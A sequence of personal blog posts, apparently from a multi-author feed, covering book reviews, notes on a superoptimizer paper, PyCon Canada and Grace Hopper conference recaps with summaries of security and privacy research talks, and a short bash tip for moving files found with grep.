... beat up an ingress portal with the help of my lvl 8 friend.

Today was less cool, what with the 2hr taxes-for-aliens session (not actually what they call it, but accurate enough), but I did make some coffee cupcakes with cream cheese icing.

I plan to feed those to my coworkers (partially to make fun of the fact that we ran out of coffee today. "Look, I brought coffee!") and anyone who shows up at the local 2600 meeting tomorrow.

Then, on Saturday I'm going to build stilts and hopefully learn to walk on them! Or more likely, bruise my knees a lot, but hey, can never learn if I don't try, right?

And on Sunday I'm playing a concert of predominantly Percy Grainger music (which is pretty music-nerdy), and then hopefully taking part in a meeting to start a local Hacker Scouts guild.

So yeah, I've mostly been living life rather than photographing it and posting about it lately, but it is a very awesome life and you should all be jealous, promise!

comments

Ages ago, I thought it would be a brilliant idea to write up stuff on the papers I read, much like I do book reviews, but then I promptly... didn't do it. But it's a new year with new papers, and here's the first for this year's seminar.


Photo: small toad by Scott* (Because tiny toads are adorable and compiler papers notes don't lend themselves to obvious illustration)

Superoptimizer -- A Look at the Smallest Program
Henry Massalin
1987

This is a neat little paper about optimizing assembly code. They took a program and then had the computer try to generate the smallest possible functionally equivalent version. The paper is super short and readable and filled with lots of very clever adding of registers and stuff to avoid program jumps and comparisons. They could get it to optimize only fairly small programs (12 lines of assembly), but it still seemed like a lot of these would be useful compiler optimizations and they're probably in use now.

Anyhow, it's three pages of explanation + two pages of cool examples they found, so if you're looking for a fun little bit of computing to read about to fill out some mind-expanding new year's resolution, this is an easy place to start.

Some questions we had in seminar that I don't know the answers to:

- What was the impact of this paper on modern compilers?
- Do we do any of this while compiling, or make use of the things they found in a preset kind of way?
- Has anyone tried to do this using modern computers / other assembly instruction sets?
- It seemed like there was a lot of adding... would it be possible to make reduced assembly instruction sets on the assumption that they will never be programmed by humans and thus can be super-optimal?

comments

I haven't been keeping up with my book reviews here although I do add them to librarything and should probably just write myself an export script so it's easier for me. But whatever, that's not done yet, and I finished a book this afternoon while I was waiting for my experiment to run, so here it is.


Under Wraps (The Underworld Detection Agency Chronicles)
by Hannah Jayne

I liked the characters and the world of this funny urban fantasy, but they seemed almost out of sync with the murder that Sophie is supposed to be solving: the serial murder case seemed to take a back seat to the banter and internal monologuing of our somewhat hapless heroine. If you're looking for serious urban fantasy give this a miss, but it's fun in a first season Buffy sort of way. I'm not sure if it really grabbed me enough to read the next one, but who knows, maybe it'll grow into something more as the series expands?

comments

I spent 3 weeks up in Ottawa, and the one thing I was looking forwards to was not having to do any more serious winter driving.

Guess what it was like here on Monday?

On the bright side, I'm glad people drive super carefully around here when they're uncertain. But it's very hard not to laugh when we're inching down the road over a light dusting of snow. Good thing I wasn't in a hurry!

comments

Looking at my twitter feed, it seems I spent my holiday with my grandmother's dog, so here's a picture:



I've been having a lovely time with my parents and Buster the dog, all of whom like long walks in the local woods. My fitbit tells me their standard afternoon walk is just shy of 3 miles, which is still more meaningful to my not entirely metric parents than it is to me, but I'm slowly learning distances in imperial from living in the US. I spent the first few days in self-quarantine since John had finally infected me with the cold/flu he caught on the way back from St. Lucia, but to be honest all I did was sneeze on a TSA agent or two, have one miserable night when I arrived and then my immune system squashed it. Yeay immune systems! So I spent a few quiet reading and walking days that I probably didn't have to do to avoid being a disease vector, but it was lovely to read and walk and enjoy the local trails.



The next few days will be a bit more chaotic as I try to meet up with people while I'm in town. If you want to get on the list, let me know! My old canadian cell # is active if you want to get in touch, and I'll be in town 'till the 7th minus a few days at new year's as usual.



comments

You may recall that my Kindle Fire decided to stop charging right before I went off on my vacation at the beginning of December, and I had a somewhat terrible experience with Amazon's online customer service but they did in the end replace it under warranty.

I've had the replacement for two weeks, and it was acting a bit weird, rebooting while I was doing things like reading pdfs. So last night, I looked up whether this was a common problem and the suggestion seemed to be to hard reboot it, so I did.

The kindle has been stuck at the kindle fire reboot screen for about 12 hours now.

Since the online chat support was awful last time, I called Amazon this time and the phone support lady was very nice, efficient and was very apologetic about not being able to get me a new device until Jan 4th. But the replacement is in the works, I just won't get it 'till after I get back from Ottawa.

Meanwhile, dead kindle #2 won't boot up and also won't shut down, so I may be sticking a running device in the mail, which feels kind of weird. Not much for it, though, since the thing is utterly unresponsive. Maybe it'll run out of battery before I get out to mail it this afternoon.

comments

Positively thrilled to announce the one-day hands-on intensive Pandas workshop and sprint for new contributors with Chang She - a Pandas core-dev leading the sprint.  Its 4 am'ish and I just finished spamming a few mailing lists, IRC channels and thought I'll write a blog-post if I must be energetically expensive.

You can find the workshop details on the wiki: https://github.com/svaksha/PyData-Workshop-Sprint/wiki/2012-NYC but here is a short "how did it happen in a week recap". Last month, I had attended a day-long "Introduction to JavaScript" by JohnResig, and I enjoyed it. Later, I met some PyLadies and on the train ride home, I felt that we needed to have a proper workshop, core-dev in attendance, leading us along the way.

Given that there was a PyData conference in NY a few weeks ago, this was the place to be at, so I pinged the diversity list for speakers, and of course IRC - The response was phenomenal and unbelievable - People went out of their way to make my wish come true - they tweeted, emailed, chatted on IRC, gave me advice, introduced me to core-devs, volunteered for the event, pinged friends for hosting space, encouraged me to write to the PSF/sprints funding, ... and on and on.

I have so many people to thank that there will be a longer blog post, post the event  ...yeah, the list is long but maybe if I get started now (and my apologies if I have missed your name  ... feel free to gently lart me, its 4AM and I am sleep deprived :)) ...  Alphabetically-ordered XXXL THANK YOU'S to: Aahz, Asheesh, Brian, Carl, Chang, David, Diana, Jesse, Josh Knowles, Krissy, Meghan, Sheila, Steve, Wes.

A friend of mine wrote a twitter bot that spits out random bits of RFCs, somewhat inspired by horse_ebooks, and I suggested it would be nice if it wrote haiku, so now it does. It's not very good at it, but I found this almost poem in the feed:

Townson makes it has
the switch functions
02 Elgamal public key

And now I really want to write a haiku including the words "elgamal public key" -- pity "exchange" doesn't fit that into a 7-syllable line.

Some of the more intentional poetry it's written:

to authenticate the
already done our paper we have
home address found

It's almost poignant. Or Yoda crossed with Glinda the good witch, whatever.

comments

You may have seen this article on Peter G. Neumann: Killing the Computer to Save It. It was making the rounds a few weeks ago. (Note that you can read NYT articles without logging in if you turn on temporary cookies and then click the link.)

In case you were curious or maybe thought some of that sounded familiar, that is indeed the same DARPA grant that drew me to the US for this postdoc. I'm on CRASH or "Clean-Slate Design of Resilient Adaptive Secure Hosts." The article has a short mention of the stuff we're doing:

Clean Slate is financing research to explore how to design computer systems that are less vulnerable to computer intruders and recover more readily once security is breached.

Dr. Shrobe argues that because the industry is now in a fundamental transition from desktop to mobile systems, it is a good time to completely rethink computing. But among the biggest challenges is the monoculture of the computer “ecosystem” of desktop, servers and networks, he said.

“Nature abhors monocultures, and that’s exactly what we have in the computer world today,” said Dr. Shrobe. “Eighty percent are running the same operating system.”

Lessons From Biology

To combat uniformity in software, designers are now pursuing a variety of approaches that make computer system resources moving targets. Already some computer operating systems scramble internal addresses much the way a magician might perform the trick of hiding a pea in a shell. The Clean Slate project is taking that idea further, essentially creating software that constantly shape-shifts to elude would-be attackers.

That the Internet enables almost any computer in the world to connect directly to any other makes it possible for an attacker who identifies a single vulnerability to almost instantly compromise a vast number of systems.

But borrowing from another science, Dr. Neumann notes that biological systems have multiple immune systems — not only are there initial barriers, but a second system consisting of sentinels like T cells has the ability to detect and eliminate intruders and then remember them to provide protection in the future.

In contrast, today’s computer and network systems were largely designed with security as an afterthought, if at all.

That barely touches on all the cool stuff we're doing, since the article isn't exactly about our work at UNM & UVA, but it was pretty neat to see it in the news.

comments

import pycon
from pycommunity import AwesomePeople

canada = pycon.path.abspath(pycon.path.dirname(__file__))
README = open(pycon.path.join(canada, 'README.rst')).read()
__version__ = '0.01'

requires = [
    'diana',
    'daniel',
    'david',
    'kay',
    'micheal',
    'nicola',
    'taavi',
    ]

Patches welcome!

Last weekend, at this moment, I was giving a technical talk at Pycon Canada, my first. Right now, I am still wallowing in the fun and warmth of friendships (some old, some new) that thawed the cold Canadian weather. It was the most mentally simulating, energy-packed experience I've had.  Oh, wait...I say that about all the PyCon conferences I attend - Well, this is my second PyCon but the first speaking gig, and it has, as before, been about meeting some of the smartest people and having the most intellectually simulating discussions with them, learning from them and having a whale of a time. Wish all my weekends were this much fUn! The Python community is known for just that - their fabulously fantastic community, which attracted me to the language (no, I love the syntax too) and has kept me hooked.

Thanks to the change in climate (thanks Sandy!), I had a migrane that got worse on the plane ride on Friday morning and I was much happier landing in a slightly warmer and dry climate in Toronto. Enjoyed the shortest ferry ride of my life and reached the Metropolitan Hotel by 2pm to find the Google goodie-bags waiting for us at the hotel room - such a nice surprise, thanks Google!  Went for a long walk in the afternoon - its a relief to be able to walk around and see the city and its inhabitants without men bumping into you, or tripping yourself over jutting stones on the sidewalk (erm...whenever Indian roads have a sidewalk), the calmness of being able to stop and click pictures without worrying about someone "accidentally" (it always is, isnt it?) feeling you up while you were just standing there admiring a monument ........ Oh, well... never mind, you get the picture!

Later that evening, there was a casual mixer event enabling attendees, speakers and some awesome sponsors (one of them being Google, whose Diversity grant made this conference a reality for me) to register, hang out, and chat before the conference, with food and drinks at the venue bar open to all... and oh, we ate some yummy cake. Mixers before your conference is a smart way to avoid the rush and long lines that will queue up to register on the morning of your conference, a nightmare if you are short on volunteers.

I managed to reach the venue thanks to Suzanne (who I randomly stopped on the road to ask for directions, instead she ended up dropping me off till the venue - its amazing how one meets kind souls), met Laura at the registration desk who saw that every attendee had their badges and tags. Nicola introduced me to Sheila, who suddenly morphed into a real person instead of an email address with a picture attached to it. In a global distributed space knit via bits and bytes, our identities are unequivocally tied to an email, twitter, G+/FB account now.

Met more interesting people and had the longest discussion with Mark Eichin and his friend Laura, on a range of technical topics, mobile technology, languages, and not excluding the mandatory talk about the DFSG and licenses in FOSS - talking legalese is the most important thing when you meet a DD (j/k). After the party, I returned to the room, met Laren, another diversity grant recipient room-sharing with me. By now, the pounding in my head was worse and the pain would not let me sleep, so I kept re-editing my slides till I was tired enough to sleep.

On Saturday morning - Day One of the conference, Laren and me walked over to the venue and I went of into the Green Room where all the speakers were pampered with food, some space to sit and work with you laptop, more food, chat with other speakers while having even more food, but I had no taste buds so I took three Advil's and gave my first technical talk.  That done, I was free to go and watch talks but instead I went off to be a volunteer - this is the easiest way to make friends with some really cool people within the community who welcome and appreciate your contribution and efforts. Its also very humbling to see the PyConCA board members and speakers who volunteered to carry in the lunch boxes the caterer had dropped off.

Post lunch, I attended the "Numerical and Scientific Computing with Python" tutorial by David, listened some great speakers, spoke to more people, had interesting discussions on NLP and linguistics with Mike and DWF, and before I knew it, it was the end of the day, which means more food - snacks and drinks were available at the bar. Did I mention that Pycon-CA pampers you with food and drinks all through the day. At every break, there was something to munch on. Every where I looked there were food boxes, fruits / salad boxes, cookies, coffee, tea, drinks, water bottles, cakes, tacos, samosas (I noticed that those ran out really quickly as compared to the salads which is not surprising), strawberry and chocolate, juice, .... ummm..ok, you get the picture. You were very well-fed and taken care of. At one point I counted the number of laptops Vs. the food boxes on the table. Guess which was outnumbered!?

Sunday morning, being the second and final day of the conference, I attended talks on Graph databases in Python and Persona (identity/privacy, which is important to me) and later, Greg Wilson and a bunch of speakers in the green room had an interesting conversation on education and knowledge (or the lack thereof) in the current education system, what role do Universities and schools have to play within the system - are they redundant with their monolithic rigid structures, MOOC's, their pro's and cons, and how the internet and technology is changing the education system, whether sites like Udacity and Coursera (did you know that their business model allows them to sell your personal details to publishers like McGraw Hill and their ilk, who have apparently signed on the dotted line) are imparting knowledge to their users and learners at the risk of their privacy? Where exactly is creativity, mental development, critical thought, knowledge and learning today? That was more food for thought than the food around the table. Post lunch, I morphed into a Runner - yeah, its that person who runs behind speakers. Katie and me were deputed to the Main hall speakers and got to see ALL the talks, including lightning talks, ending with Fernando's (not-to-be-missed) closing keynote.

Videos:

No matter how hard you try, you cannot attend every fantastic talk out there. When Carl sent across the video link to me, I was stunned by the excellent production quality. The first thought that crossed my mind was "Wow, that is a second career right there" and sure enough it is - these excellent videos are brought to you by nextdayvideo.com :

* Taavi showing you how pandas get a workout
* Elizabeth Leddy rocking the Main Hall
* Did you Test today?
* No conference is complete without a talk on "BigData"
* Brandon Rhodes on why he thinks Python is beautiful (a must see if you are a beginner to Python)

Wow, this post has gotten too long. Among all the things, I admire the organizational abilities of the board the most. The conference had awesome sponsors too, one of them being Google, whose Diversity grant made it possible for me to attend the event. Initially, when my talk was accepted, I had planned book the bus tickets in advance so that I could stretch the grant money to enable me to attend both the days of the conference. When I mentioned this to Diana, she worked her magic, enabling me to cover my flight bookings and also the hotel stay within the grant. Amazing team! Kudos to the PyCon-Canada team.

So, it turns out that not only do I dislike half the samples I can find online of good philosophy of teaching statements, I also hate everything I write on that front. But the deadline is today and my references have already sent in their letters, so I think I've just got to suck it up and submit what I have.

I am, however, pleased with the ideas in this paragraph on failure:

But perhaps the biggest lesson was about failure: Many students seemed to believe that any failure was a sign of fundamental, unfixable inadequacy, and this was especially toxic to the women and other minority students who were more likely to feel like imposters. But many self-taught programmers learn through experimentation and repeated failure, so we encouraged students to do this in tutorials and even celebrated ridiculous bugs together by encouraging the students to share them and help each other debug. The students who had difficulties at the beginning could see other students failing and then succeeding, and the change in their confidence levels was noticeable, as was the resulting change in what they attempted and what they achieved.

That's a little piece of what made teaching tutorials such a different experience from lecturing, and something I really loved watching happen every year.

comments

Darklandia by T.S. Welti

This is an amazing novel, a utopian-dystopian world and a teenager slowly becoming aware that the world around here is not as she's been led to believe. I found it reminiscent of young adult sci fi I loved as a kid, such as Devil on My Back by Monica Hughes, or more recent takes on the genre such as Maria V. Snyder's Inside Out. Perhaps Brave New World would be a closer match to the Felicity-medicated world in Darklandia, but this walks the careful line of feeling familiar without feeling unoriginal.

What blew me away the most is that even though I was noticing clues that should have led me to the shocking ending, I didn't make the connection until the very end. Masterfully done, and while I could see how others might feel unsatisfied, I thought it was brilliant.

It's quite the page turner: I caught myself finishing it hours past my bedtime. I highly recommend this one, especially to fans of this type of speculative/science fiction, just make sure not to start it too late in the evening!

I was fortunate enough to win this in a LibraryThing member giveaway, but regardless of how I obtained the book, I can honestly say that this is among the top books I've read this year... and it's nearly November! The rest of my reading list will have a lot to live up to.



comments

I'm mildly discombobulated since my flight got in quite delayed last night and I swear, there wasn't enough time between travel even though I had more than a week, but here's updates:

(1) GSoC Mentor Summit was amazing, filled with open source folk who were also passionate about mentoring. It was cool having lots in common with every person I talked to all weekend.

(2) I have pictures, largely of playing powerpoint karaoke yesterday. Also of some of the guys playing rugby in the hot tub. ;) (Well, okay, just tossing a ball around, but still!) They need some serious culling so expect most of them later in the week. Arc pulled the best ones off my camera and they're here: https://plus.google.com/u/0/109741359399131092509/posts/VHbodBCsBPJ (Thanks to Denis of Gentoo for being our photographer!)

(3) Oh yeah, the big announcement is that I'm going to be the Org admin for the Python Software Foundation next year. Doomed! So yeah, I go from managing my 3 students, 7 mentors for Mailman (and backup managing another 3 students from Systers), to around 30 students spread across a pile of sub-organizations. Should be fun. Or terrifying. :) I'll probably write more about this later once it's had more time to sink in.

(4) I need to also make time to encourage folk to come to Pycon. There is financial aid available and the application is up. I'm going to be sending more personal notes out to my new contributors from GHC12 and my GSoC students from Systers and Mailman. The Mailman sprint last year was probably the most satisfying hacking event I've ever attended, and I want others to have that experience. :)

(5) I did get all my GHC12 pictures up before I left: https://secure.flickr.com/photos/terrio/sets/72157631687919350/

(6) My last official GHC12 blog post (about the open source day hackathon) is pending now that I have photos to go with it. I've got notes for a few more, but not sure I'll have time to write them.

In theory, I'll be home in New Mexico and not traveling again 'till December. Which is good, because I need to put together academic applications, write a paper with my remaining thesis research (the tech report got cited twice already, which is a sign that I should have something more peer-reviewed out there), and get the research done for my next paper. Plus, you know, squash all the open bugs/add all the missing features in Postorius, make sure the port of dynamic sublists to Mailman 3 is finished, and purchase flights for my trip home in December.

I feel like I should be a lot more stressed about all that I've got on my plate, but after a weekend with open source folk, I'm feeling pretty relaxed and pleasant and like it's all going to work out somehow. And to be honest, that feeling may be the most important thing I'm bringing back from Mountain View this week. :)

comments

Back in one of my early, unpaid co-op jobs, I discovered that my otherwise reasonably experienced boss hadn't ever used tab completion, and it got me thinking a lot about how I learned a lot of command line habits through a combination of word of mouth and a personal conviction that the computer should be able to do anything I found repetitive (alas, I have not taught it to load the dishwasher). But the real take-home message is that there's a lot of little linux tricks that aren't really obvious to everyone. So in that spirit, here's an incredibly tiny script I wrote today that might be useful to someone else:

Moving files found with grep

I had a bunch of output files from my experiments, and I wanted to know at a glance which ones had failed, and then move those files to a subdirectory, leaving me with a smaller list of successes to evaluate in more detail.

Here's the script as a one-liner, the way I'd enter it:
for a in `grep -l -z "No repair found" repair.debug.*` ; do echo $a; mv $a notfound/; done

And here's some explanation:

grep -l "No repair found" repair.debug.*

My particular experiment prints a line "No repair found" when the run fails, so that's what I'm searching for in the output files it generates (repair.debug.*). The -l makes grep print just the filenames so I don't have to do any special work to parse them from the output. (You can also use the longer but easier-to-read --files-with-matches. I'm guessing -l was intended as "l for list" but I don't know.)

When I was googling for the -l flag, I did find some people with fancy xarg stuff you could do here, but seriously, if all you need is the filename save yourself some hassle. If your filenames have spaces in them, you may find it useful to do that and some fanciness with -z to change the delimiters to be \0s, but I didn't need to do that.

for a in ` ... `; do ... ; done

This is my favourite little bash for loop with the functional bits cut out. It iterates over whatever you gave it in ` ... ` putting each item in $a as it goes through. In this case, each $a is one of the found filenames. You can do away with the backticks all together if you just want a list of filenames that you could get from ls, though. If I'd wanted to move all my repair.debug.* output files, I could have done for a in repair.debug.*; do mv $a output/; done -- no backticks! I do this all the time for moving files out of my way before I start a new experiment, using directories with the date to keep track of what ran when.

Another useful command to put in there other than a grep is `seq 10` which will give you a standard counted for loop that goes up to 10. Very useful when I want my computer run an experiment 10 times while I go to lunch!

echo $a
I almost always run a version of the loop with *just* "echo $a" in the middle before I make one that does anything, just as a sanity check to make sure I got the expression right and I am actually doing stuff to the right files. I usually leave it in the final version so I can scan the output easily and see what was done. Sometimes I actually output the whole command as an echo for debug purposes

mv $a notfound/

The easy part: moving each file that matched into my notfound/ directory.


And... there you have it! A quick way to move a set of files out of your way and a little bit about how to automate other repetitive tasks on the command line. Probably obvious to many, but who knows, maybe this is exactly the script that someone else needs.

comments

Ada Lovelace Day aims to raise the profile of women in science, technology, engineering and maths by encouraging people around the world to talk about the women whose work they admire. This international day of celebration helps people learn about the achievements of women in STEM, inspiring others and creating new role models for young and old alike.

When I first met Robin Jeffries, I had no idea how important she was. My friend Jen said, "hey, you need to talk to Robin about this" and the three of us sat down and chatted about technical stuff for an hour or so in the middle of a busy conference. It didn't hit me until much later that I'd just spent a time geeking it up with a woman who half the women at GHC would have loved to shake hands with, let alone get a whole lunch with.

Robin has just retired as Her Systers Keeper, a role she took over from Anita Borg when Anita's health was failing. She's not wrong in calling managing a community like this a job of cat herding, but with her guidance Systers has long been a list with an unusually high signal to noise ratio, and one that many technical women turn to when they need advice, want to share a story, or want to rant about the latest news piece about women in computing. I started realizing how much of a role model Robin herself has been to so many when I'd mention her and people would go, "wait, you know Robin Jeffries? I've always wanted to meet her in person!" These were women who were inspired by the stories she shares and her ability to get to the heart of the matter when it comes to the experience of technical women.

I've been fortunate enough to work with Robin doing Google Summer of Code mentoring for Systers, where we've been doing modifications on an open source project dear to my heart, GNU Mailman. She's got an uncanny ability to find good chunks of technical work that our students can manage, a knack for inspiring the people she works with, a good system for managing us all and keeping us to our deadlines, and every time we sit down to talk about how to fix a problem she impresses me with her insights into better architectures and designs. I've rarely had the chance to work with someone of Robin's experience in human computer interaction (read her bio, but in short, she's crazy accomplished and I probably would have been way intimidated if I'd known how much so when I first met her). I'm constantly in awe of how easily she not only applies that experience, but how good she is at conveying it to others and how willing she is to share her skills.

We're probably all benefiting from her knowledge as she applies it to her job at Google, but it's the more direct personal experiences that really get me. For example, despite being in great demand with the Systers 25th anniversary celebrations at GHC12 this year, she came out to help me run Open Source Day activities for women interested in hacking with Systers and Mailman, quickly adopting a whole table of prospective volunteers and walking them through the first stages of evaluating and contributing to an open source project. She regularly makes me wish I'd spent more time studying HCI myself, and forces me to re-evaluate how I design software. We've got one big feature we want to see in Mailman and I'm really looking forwards to working with her on making it happen.

I admire Robin for her amazing technical expertise, for her support of women in computing, and for her ability to balance the two as part of her own busy life for so many years. It has most definitely been my privilege to work with such an amazingly talented woman, and I hope that some day I can approach her level of professional and personal accomplishment.

comments

This may have been the most directly practical of the sessions I attended! My raw notes are on the GHC12 wiki (and they're quite interesting, including a lot of questions from the audience) but here's some take home messages:

When job hunting, make sure to excel at the following:

(The speaker joked about this as "win all steps, all the time")

1. Resume and web presence

If you don't have an online presence, you can get passed over. Nowadays, this includes LinkedIn, and the speaker (as a LinkedIn employee) told us that filling in more information is generally better, and that your LinkedIn profile can be used to supplement a shorter resume with greater detail if you so desire.

2. Meeting the recruiter

A recruiter is interested in your passions, your fit with the company and company culture, so articulate your interests and show your personality!


3. Phone screen.

Be prepared and do research on the company. The worst thing is to be unprepared, so make sure you learn about the company and have questions ready. Show your passion during the interview, and let the interviewer push you in the right direction -- if you're not a great fit for one position, they might know of others. And make sure, even if you're not sure if you want the job that you treat it seriously: it's good practice and you don't know if you might want to apply for another position in the organization.

4. Onsite interviews.

For tech interviews, you need to be comfortable writing on a whiteboard, so practice doing it, and practice articulating your ideas as you write. This is the way to show your interviewer how you think!



When writing a Technical resume, make sure to excel at the following:
1. Fundamentals.

Make sure you've proofread and had others proofread for spelling and other mistakes, and make sure the formatting is organized and consistent.

2. What did you contribute or learn

Women especially want to focus on the team effort, but companies want to know about you, so focus on what you did to affect the outcome of a project. Make sure to differentiate yourself: don't just list skills, talk about how you applied them.

3. What value was added in the end result?

Think about the bigger picture and talk about how your work impacted the project, your company, the world. If you can, quantify what you did whether that's percent speed up, dollars saved, or increased value of the project.

4. Differentiate yourself, authentically

Highlight ways you stand out, especially as a leader. Did you take on additional responsibilities? Negotiate between two groups? Do exceptional community service? You shouldn't over-embellish, but make sure you demonstrate what makes you awesome and unique.

5. Does your resume convey your personal brand?

One way to check this is to have someone read it and ask them to summarize you in two sentences or 5 keywords. If what they say doesn't match up with what you'd hoped to convey, maybe you're sending the wrong message and need to revisit.


There were a lot of really interesting questions at the end of this session, and if you're interested my raw notes are on the GHC12 wiki, including all those questions.

Note: If you're one of the speakers and feel I accidentally mis-represented your talk or want me to remove a photo of you for any reason, please contact me at terri(a)zone12.com and I'd be happy to get things fixed for you!

comments

Enhancing security and privacy in online social networks
Sonia Jahid


Social networks have traditionally had some strange ways of dealing with security and privacy, and bring new challenges. How do we handle it if you leave a comment on a private photo and that later becomes public? Right now many networks would make the comment public, but does that make sense?

Sonia Jahid notes that one of the oddities of the social network is that traditionally we don't go through a 3rd party to talk to our friends, and some of the challenges towards a private and secure social network stem from that change. She proposes looking at a more decentralized model, but this forces us to make new decisions and answer new questions. For example, where is data going to be stored? (will I keep it myself? what if I'm offline?) What does access control mean for social networks? How do those models change if the network is decentralized? How can one efficiently provide something like a news feed for a distributed network?

I think one of the key insights of this talk is that while these questions may not seem that urgent for a facebook status update (what if you don't care about those?), many of these questions come up in other applications. For example, medical record sharing can be likened to a social network, where patients, doctors, hospitals, specialists, etc. all want to share some data while keeping other data private. And bringing the problem into the healthcare space brings other challenges: what if we need a "in case of emergency break glass" policy where if the patient is hospitalized while traveling, her medical data can still be accessed by the hospital that admits her. What if the patient wishes to see an audit listing everyone who has accessed her data? (How can we make that possible while keeping that information private from other folk?)

There's clearly some really interesting problems in this space!

Securing Online Reputation Systems
Yuhong Liu



Trust exists between people who know each other, but what if we want to trust people we may not know? This is the goal of reputation systems, but these ratings can be easily manipulated. Yuhong Liu points out a movie rating that was exceptionally high while the movie was during its promotional period, but fell rapidly once it had been out a while. Her research includes detecting such ratings manipulation.

For a single attacker, common strategies include increasing the cost of obtaining single userids, investigating statistically aberrant ratings, or giving users trust values, but all of these can be worked around, so Yuhong Liu's research includes a defense where she builds a statistical model based on the idea that items have intrinsic quality which is unlikely to change rapidly. She found that colluding users often share statistical patterns, making it possible to detect them.

One of the interesting things about this talk was a question from the audience about the complexity of this model: Because the first pass of the model uses a threshold to determine areas of interest in the ratings, we can avoid doing larger checks constantly and can focus only on regions of interest, making this much more feasible as far as run time goes. Handy!

On Detecting Deception
Sadia Afroz



Deception: adversarial behaviour that disrupts regular behaviour of a system

Sadia Afroz's work involves detecting deception three areas:
1. in writing where an author pretends to be another author.
2. websites pretending to be other webites (phishing)
3. blog comments (are the legit or are they spam?)

All of these are interesting cases, but I was most fascinated by the fact that her algorithm was fairly good at detecting short-term detection (e.g. a single article aping someone else's style) but had more difficulty detecting long-term deception like in the case of Amina/Thomas MacMaster. (This might be interesting to badgerbag?) Are long-term personas actually a different type of "deception" ?

---

All in all, lots of food for thought in this session. I've also uploaded my raw notes to the GHC12 wiki in case anyone wants a bit more detail than in this blog post.

Note: If you're one of the speakers and feel I accidentally mis-represented your talk or want me to remove a photo of you for any reason, please contact me at terri(a)zone12.com and I'd be happy to get things fixed for you!

comments

It's a sad, sad statement about the tropes of urban fantasy that Seanan McGuire's "No, I will not rape my characters. Ever." statement makes me want to Read All The Books. I mean, I was a casual fan before, but knowing that they'll be staying rape-free? This is actually a huge selling point for me.

I don't suppose anyone else wants to recommend any other good rape-free modern fantasy?

comments

Archive spreadsheet at https://docs.google.com/spreadsheet/ccc?key=0Ar0uodm2Q4WVdERsb1NXT215SW5DMkYwOUxTa2NRb2c#gid=0

I am writing this blog to determine how to add a PDF to a blog.  Here is a link to a document that I own on Google Docs. Let's see if it works:

I've got a year left in my postdoc at the University of New Mexico, which means, sadly, that it's nearly time for me to start getting serious about job hunting. If all things were equal, I'd like to wait longer and spend more time concentrating on my awesome work here or maybe take the time off for open source work that I'd promised myself after my PhD but didn't get, but things are not all equal, and between the constraints of academic calendars, my visiting scholar visa (which can be transferred between institutions but not if I wait too long between jobs) and a few other factors, it's about time to dive into the job search.

One of the nicer reasons to start the job hunt in October is that I'll be attending GHC12 and I'll be able to take advantage of their mentoring sessions and career fair. And it's that job fair I've been thinking about today, because of a recent PNAS study that found that Science faculty’s subtle gender biases favor male students. Now, as someone who's probably going to interview at some universities, that is one heck of a depressing result to hear just before kicking off a job search.

I've seen a few write-ups about their results on top of reading the paper itself, but this write up from a Scientific American blog is probably my favourite because it doesn't pull any punches:

Whenever the subject of women in science comes up, there are people fiercely committed to the idea that sexism does not exist. They will point to everything and anything else to explain differences while becoming angry and condescending if you even suggest that discrimination could be a factor. But these people are wrong. This data shows they are wrong. And if you encounter them, you can now use this study to inform them they’re wrong. You can say that a study found that absolutely all other factors held equal, females are discriminated against in science. Sexism exists. It’s real. Certainly, you cannot and should not argue it’s everything. But no longer can you argue it’s nothing.

We are not talking about equality of outcomes here; this result shows bias thwarts equality of opportunity.

They controlled for many factors often used as reasons for disparity and gave people identical resumes to evaluate, some with a female name attached, some with a male name. (If this sounds familiar, it may be because a similar tactic was used in widely-reported tests that demonstrated racial discrimination in hiring. I'm pretty sure I've seen similar tests for other types of hiring discrimination too, but this one focused specifically on scientists.)

Interestingly, the discrimination came from women as well as men, and it appears to have been unintentional, perhaps a side effect of cultural bias that ranks female candidates as less competent than males in this area. Which is awfully disappointing, but maybe not surprising to anyone who's done some research in the area. However, that doesn't mean this is a hopeless situation:

I’m willing to bet that many in the study, just like people who take Implicit Association Tests, would be upset to learn they subconsciously discriminate against women, and they would want to fix it. Implicit biases cannot be overcome until they are realized, and this study accomplishes that key first step: awareness.

And here's where I come back to why I'm so excited to kick off my job hunt at the GHC12 career fair: these are companies that have reached the point of awareness that they aren't hiring as many women as they like. So even in the face of research that is pretty upsetting for someone like me just starting on a job hunt, I've still got a nice opportunity to start off with organizations who are aware and actively trying to combat hiring biases.

Not everyone can make it out to the GHC career fair (GHC tickets are sold out!) but you can take a look at the sponsors and the career fair guide and think, "hey, these companies care." It's easy to get inundated with "and now let's thank our sponsors!" moments at a conference, but it's worth recognizing that these companies are demonstrating not only a financial commitment but also a social one when they choose what conferences to sponsor. I like to think that it says something really great when they choose to sponsor the Grace Hopper Celebration of Women in Computing.

comments

I'm going to be blogging from the Grace Hopper Celebration again this year; this post is just so that something shows up in the feed for ghc12 tag while they're configuring the blogroll.

comments

I'm trying to get back into the swing of doing active photo assignments every week. So here's this week's photos and explanations:

Trail and tram

Taken for AAW: Still and Moving

The Sandia mountain peak is at 10,378 feet, and the tram is definitely the fastest way there, taking you from 6500ish feet to over ten thousand in around 15 minutes. More about the Sandia tram. However, it is actually possible to hike all the way up there if you have a lot of time and even more stamina... One way is definitely faster than the other.

On the left, you can see the quiet hiking trail that I'm standing on to take the picture (note the complete lack of guard rails as you walk along the edge of the ridge) and on the right you can see the tram, constantly in motion bringing passengers ascending to the peak. (Yup, you can see the passengers if you view this large!)

What it took:
$20 for the tram ride, a short hike along the ridge looking for a nice spot where I could see both trail and tram, and some waiting. I wish I'd thought to do a nice HDR here, but I forgot until the tram was too close to fiddle with camera settings, so this was post-processed to balance out the exposure a bit and bring out some more of the colour the way it looked to my eyes.

---

Music in motion and stillness

Taken for AAW: Still and Moving

As a musician, I'm often told to remember that the silences and stillness are as important to a piece as the notes, so when I saw the "Still and moving" assignment I immediately thought of music.

It's hard to show sound in a photo, but it is a little possible with a stringed instrument because you can see the moving strings that produce the sound. In this case, the four right most or lowest strings are being plucked, while the two upper strings remain (mostly) still.

What it took:
